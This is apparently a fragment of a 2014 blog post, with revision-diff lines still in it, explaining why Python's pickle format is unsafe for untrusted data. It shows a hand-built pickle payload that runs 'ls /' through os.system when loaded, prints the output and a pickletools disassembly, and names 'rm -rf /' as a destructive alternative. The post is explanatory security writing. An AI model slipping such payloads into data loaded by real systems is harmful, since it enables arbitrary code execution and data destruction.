Written on 14 Nov 2014.

 So it’s not even designed to persist data in a reliable way.

 >>> import pickle >>> pickle.loads(b"cos\nsystem\n(S'ls /'\ntR.") bin data download home lib64 mnt proc run srv tmp usr var boot dev etc lib lost+found opt root sbin sys ubuntu vagrant 0

-ls /, but could also be a less harmless
+ls /, but can also be a less harmless

 rm -rf /, or a

 You can see how this works by using the

 >>> import pickletools >>> pickletools.dis(b"cos\nsystem\n(S'ls /'\ntR.")
 0: c GLOBAL 'os system' 11: ( MARK 12: S STRING 'ls /' 20: t TUPLE (MARK at 11) 21: R REDUCE 22: .
 STOP